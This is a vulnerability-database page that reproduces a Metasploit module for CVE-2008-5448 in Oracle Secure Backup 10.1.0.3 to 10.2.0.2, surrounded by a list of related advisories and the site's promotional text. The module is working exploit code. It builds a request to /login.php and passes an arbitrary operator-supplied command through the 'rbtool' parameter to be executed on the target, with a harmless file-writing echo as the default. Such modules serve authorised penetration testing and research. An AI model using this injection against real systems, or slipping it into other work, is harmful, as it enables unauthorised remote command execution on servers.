Lucene search
K

Oracle Secure Backup exec_qr() Command Injection Vulnerability

🗓️ 23 Feb 2009 16:26:00Reported by MC <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 22 Views

Oracle Secure Backup exec_qr() Command Injection Vulnerability exploitatio

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2008-5448
29 May 201815:50
circl
Check Point Advisories
Oracle Secure Backup Multiple Command Injections (CVE-2008-4006; CVE-2008-5448; CVE-2008-5449)
23 Feb 200900:00
checkpoint_advisories
CVE
CVE-2008-5448
14 Jan 200901:00
cve
Cvelist
CVE-2008-5448
14 Jan 200901:00
cvelist
d2
DSquare Exploit Pack: D2SEC_ORA_SECBACK
14 Jan 200901:30
d2
Dsquare
Oracle Secure Backup 10.2.0.2 RCE (Linux)
27 Apr 201200:00
dsquare
Dsquare
Oracle Secure Backup 10.2.0.2 RCE (Windows)
27 Apr 201200:00
dsquare
NVD
CVE-2008-5448
14 Jan 200901:30
nvd
OpenVAS
Ubuntu USN-708-1 (hplip)
20 Jan 200900:00
openvas
OpenVAS
Ubuntu USN-707-1 (cupsys)
5 Jun 200900:00
openvas
Rows per page
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Oracle Secure Backup exec_qr() Command Injection Vulnerability',
      'Description'    => %q{
          This module exploits a command injection vulnerability in Oracle Secure Backup version 10.1.0.3 to 10.2.0.2.
      },
      'Author'         => [ 'MC' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2008-5448' ],
          [ 'OSVDB', '51342' ],
          [ 'URL', 'http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2009.html' ],
          [ 'ZDI', '09-003' ],
        ],
      'DisclosureDate' => '2009-01-14'))

    register_options(
      [
        Opt::RPORT(443),
        OptString.new('CMD', [ false, "The command to execute.", "cmd.exe /c echo metasploit > %SYSTEMDRIVE%\\metasploit.txt" ]),
        OptBool.new('SSL',   [true, 'Use SSL', true]),
      ])
  end

  def run

    r = Rex::Text.rand_text_english(2)

    cmd = datastore['CMD']

    uri = "/login.php?clear=no&ora_osb_lcookie=&ora_osb_bgcookie=#{r}&button=Logout&rbtool="

    req = uri + Rex::Text.uri_encode(cmd)

    print_status("Sending command: #{datastore['CMD']}...")

    res = send_request_raw({'uri' => req,},5)

    print_status("Done.")

  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

02 Oct 2020 20:00Current
0.5Low risk
Vulners AI Score0.5
CVSS 210
EPSS0.3857
22